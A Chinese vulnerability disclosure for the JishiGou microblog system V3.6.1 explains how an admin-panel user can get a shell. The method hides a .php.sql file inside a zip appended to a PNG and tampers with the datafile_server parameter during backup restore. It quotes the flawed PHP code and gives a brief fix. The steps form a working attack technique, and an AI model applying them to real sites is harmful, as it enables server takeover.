记事狗微博系统，后台存在设计缺陷，可导致进入后台者获得shell
版本：V3.6.1 Build 20120718
1.系统工具->数据备份->自定义备份->选择一张数据量较小的表->更多选项->选择压缩备份文件->多分卷压缩成一个文件。
 
 
 
直接提交。
2.直接把备份文件下载下来，然后往备份文件添加一个zzz.php.sql，内容为<?php phpinfo();?>
 
 
 
3.然后找一张正常的图片 执行cat yy520.zip >> yy520.png ，前台提交yy520.png
 
4.获取图片的地址images/topic/6/17/14_o.jpg，回到后台 系统工具->数据恢复
 
 
 
 
点击解压缩，用burp suite 截包
 
 
 
 
修改为：datafile_server=./images/topic/6/17/14_o.jpg
最后访问
 


 
最后的最后，请让我解释一下，为什么上面会有那么多2b的步骤。
1.
 
$datafile_server = get_param('datafile_server');
。。。。。
$unzip->ReadFile($datafile_server);
 
  if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/\.sql$/i", $importfile = $unzip->GetName(0))) {
               $this->Messager('数据文件不存在: 可能服务器不允许上传文件或尺寸超过限制。',null);
    }
由于上面preg_match的限制，在压缩文件里面的文件名必须是以sql结尾，这个可以用apache解析绕过，所以我们的文件名必须是***.php.sql
 
2.
 
$identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256))));
           $confirm = !empty($confirm) ? 1 : 0;
          if(!$confirm && $identify[1] !=SYS_VERSION) {
。。。。反正就不是解压的操作
       }
 
在进行导入的时候它会查看压缩包的第一个文件的头部，然后决定是直接导入，还是先解压，所以我们需要一个正常的备份文件，也就是那个yy520-1.sql
才会执行下面
 
$sqlfilecount = 0;
          foreach($unzip->Entries as $entry) {
              if(preg_match("/\.sql$/i", $entry->Name)) {
                  $len = Load::lib('io', 1)->WriteFile('./data/backup/'.$backupdir.'/'.$entry->Name, $entry->Data);
                   $sqlfilecount++;
               }
          }
3.
然后我就屁颠屁颠的跑前台上传zip文件，后来我发现上传后的zip文件路径是记录在数据库中，路径是由一个mysql_insert_id 来随机生成滴，本来想暴力破，直接提交乌云，敷衍了事，后来想想意义不大。然后发现$unzip->ReadFile($datafile_server);可以读取jpg的，然后就把那个zip文件直接改为jpg上传，提示错误（不是一个有效的图片），看了代码 www.2cto.com
 
if(function_exists('exif_imagetype') && !exif_imagetype($temp)) {
                   $this->_setError(507);
                    return false;
               } elseif (function_exists('getimagesize') && !getimagesize($temp)) {
                   $this->_setError(507);
                    return false;
              }
 
然后就必须用一个正常文件，所以必须用cat yy520.zip >> yy520.png
 
后台拿个shell有必要那么难为我吗～。～


修复方案：
稍微微的过滤一下下$datafile_serve

作者 yy520